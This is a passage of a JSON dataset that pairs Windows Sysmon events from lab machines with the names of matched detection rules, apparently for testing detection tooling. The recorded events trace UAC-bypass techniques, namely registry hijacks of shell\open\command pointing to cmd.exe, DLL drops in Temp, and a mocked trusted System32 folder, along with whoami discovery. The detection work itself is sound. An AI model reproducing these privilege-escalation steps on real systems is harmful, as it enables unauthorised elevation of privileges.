22:19:18.317"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":27636,"Execution_attributes":{"ProcessID":2796,"ThreadID":3572},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-04-25T22:19:28.080717Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-10 13:49:29.789","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-8169-5CD5-0000-0010D7982300","ProcessId":3552,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\NTWDBLIB.dll","UtcTime":"2019-05-10 13:49:29.789"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15706,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:49:29.789907Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-10 13:49:34.899","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-816E-5CD5-0000-0010FEB62300","ProcessId":1700,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-10 13:49:34.899"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15707,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:49:34.946157Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /groups","Company":"Microsoft Corporation","CurrentDirectory":"C:\\temp\\PowerShell-Suite-master\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-26E1-5CDA-0000-002087350100","LogonId":"0x13587","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-28A0-5CDA-0000-001074181300","ParentProcessId":2016,"ProcessGuid":"365ABB72-28D0-5CDA-0000-00103A6B1300","ProcessId":2676,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 02:32:48.290"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17715,"Execution_attributes":{"ProcessID":2024,"ThreadID":2004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-14T02:32:48.290682Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /groups","Company":"Microsoft Corporation","CurrentDirectory":"C:\\temp\\PowerShell-Suite-master\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-26E1-5CDA-0000-002087350100","LogonId":"0x13587","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-28A0-5CDA-0000-001074181300","ParentProcessId":2016,"ProcessGuid":"365ABB72-28D0-5CDA-0000-0010F76F1300","ProcessId":3964,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 02:32:48.342"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17717,"Execution_attributes":{"ProcessID":2024,"ThreadID":2004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-14T02:32:48.359432Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:46:10.344","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-FC52-5CD6-0000-0010357F1200","ProcessId":3812,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 16:46:10.344"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15970,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:46:10.344282Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:46:15.484","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-FC57-5CD6-0000-00101FAF1200","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 16:46:15.484"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15972,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:46:15.547407Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B07F-5D46-0000-001031A90F04","ProcessId":1768,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 10:16:31.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5944,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:31.476803Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B07F-5D46-0000-0010F1B20F04","ProcessId":2444,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)","UtcTime":"2019-08-04 10:16:31.572"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5946,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:31.609571Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Wsreset UAC Bypass","Bypass UAC via WSReset.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c start C:\\Windows\\system32\\cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\WSReset.exe\" ","ParentImage":"C:\\Windows\\System32\\WSReset.exe","ParentProcessGuid":"747F3D96-B080-5D46-0000-0010D4EA0F04","ParentProcessId":2112,"ProcessGuid":"747F3D96-B091-5D46-0000-001081F71104","ProcessId":820,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-04 10:16:49.960"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5950,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:50.009124Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B097-5D46-0000-0010E1321204","ProcessId":1960,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)","UtcTime":"2019-08-04 10:16:55.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5953,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:55.441262Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B097-5D46-0000-0010E7381204","ProcessId":3444,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 10:16:55.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5955,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:55.643799Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows \\System32\\winSAT.exe\" formal","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows System Assessment Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991","Image":"C:\\Windows \\System32\\winSAT.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-D21D-5D3C-0000-0020DD5C2300","LogonId":"0x235cdd","ParentCommandLine":"\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" ","ParentImage":"C:\\Users\\IEUser\\Downloads\\UACBypass.exe","ParentProcessGuid":"747F3D96-D39D-5D3C-0000-001026F55500","ParentProcessId":6632,"ProcessGuid":"747F3D96-D39D-5D3C-0000-0010131E5600","ProcessId":7128,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-27 22:43:41.972"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4727,"Execution_attributes":{"ProcessID":2748,"ThreadID":3376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-27T22:43:42.033042Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows \\System32\\winSAT.exe\" formal","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows System Assessment Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991","Image":"C:\\Windows \\System32\\winSAT.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D21D-5D3C-0000-0020EE5B2300","LogonId":"0x235bee","ParentCommandLine":"\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" ","ParentImage":"C:\\Users\\IEUser\\Downloads\\UACBypass.exe","ParentProcessGuid":"747F3D96-D39D-5D3C-0000-001026F55500","ParentProcessId":6632,"ProcessGuid":"747F3D96-D39E-5D3C-0000-0010805A5600","ProcessId":3904,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-27 22:43:42.354"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4730,"Execution_attributes":{"ProcessID":2748,"ThreadID":3376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-27T22:43:42.392880Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6","Image":"C:\\Windows \\System32\\winSAT.exe","ImageLoaded":"C:\\Windows \\System32\\WINMM.dll","ProcessGuid":"747F3D96-D39E-5D3C-0000-0010805A5600","ProcessId":3904,"Product":"?","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-07-27 22:43:42.661"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4732,"Execution_attributes":{"ProcessID":2748,"ThreadID":3384},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-27T22:43:43.016956Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\Windows\\System32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-095D-5EB4-0000-001082FF1700","ProcessId":7084,"RuleName":"PrivEsc - T1088 - UACBypass - changepk UACME61","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Launcher.SystemSettings\\shell\\open\\command\\(Default)","UtcTime":"2020-05-07 13:13:01.680"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":112814,"Execution_attributes":{"ProcessID":2888,"ThreadID":3384},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-05-07T13:13:01.683498Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 09:50:08.491","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-9AD0-5CD6-0000-001077FC1600","ProcessId":1136,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 09:50:08.491"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15875,"Execution_attributes":{"ProcessID":2000,"ThreadID":1748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T09:50:08.491568Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 09:50:13.464","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-9AD5-5CD6-0000-0010C4131700","ProcessId":3716,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 09:50:13.464"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15877,"Execution_attributes":{"ProcessID":2000,"ThreadID":1748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T09:50:13.509892Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-BDD1-5EC9-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"c:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-CA4E-5EC9-0000-00109FE23700","ParentProcessId":1516,"ProcessGuid":"747F3D96-CA52-5EC9-0000-001027FA3700","ProcessId":4456,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-24 01:13:54.117"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":196375,"Execution_attributes":{"ProcessID":2812,"ThreadID":3656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-24T01:13:54.120170Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Taskmgr as Parent"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\windows\\system32\\taskmgr.exe","ParentImage":"C:\\Windows\\System32\\Taskmgr.exe","ParentProcessGuid":"00247C92-858E-5F7B-0000-00105241202B","ParentProcessId":18404,"ProcessGuid":"00247C92-858E-5F7B-0000-0010E741202B","ProcessId":6636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 20:43:58.450"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164892,"Execution_attributes":{"ProcessID":5424,"ThreadID":6708},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-05T20:43:58.451314Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"POC.exe","Company":"","CurrentDirectory":"C:\\Users\\Public\\POC\\bin\\Debug\\","Description":"SearchIndexer","FileVersion":"1.0.0.0","Hashes":"SHA1=3DA62D5328C591481C9C262BC3A77E5FF32EDBB6,MD5=15661E68D8031891DF6E0E70B547AEBB,SHA256=BEF67963D92D027E39CC5FC927805A4EBFE58C2121BA9396356EF0CE257D0C92,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-18F5-5F76-0000-002073A80500","LogonId":"0x5a873","OriginalFileName":"POC.exe","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" 